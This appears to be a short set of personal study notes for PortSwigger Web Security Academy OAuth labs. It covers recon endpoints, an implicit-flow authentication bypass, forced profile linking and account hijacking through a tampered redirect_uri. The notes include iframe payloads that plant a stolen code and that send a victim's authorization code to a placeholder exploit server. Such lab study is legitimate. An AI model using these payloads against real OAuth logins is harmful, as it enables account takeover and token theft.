recon on

/.well-known/oauth-authorization-server
/.well-known/openid-configuration

authentication bypass via oauth implicit flow

Intercept /authenticate endpoint and cahnge the client_id to the email address of the victim

Forced oauth profile linking

Do a login using social media. Intercept /oauth-linking endpoint, steal the token and iframe it to the victim

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/oauth-linking?code=STOLEN-CODE"></iframe>

Then relogin using social media

account hijacking

login using auth. Login again, intercept and chang the redirect_uri. Get the token from the logs use

<iframe src="https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.web-security-academy.net&response_type=code&scope=openid%20profile%20email"></iframe>

and deliver to victim. Relogin as victim.

stealing token via open redirect

see portswigger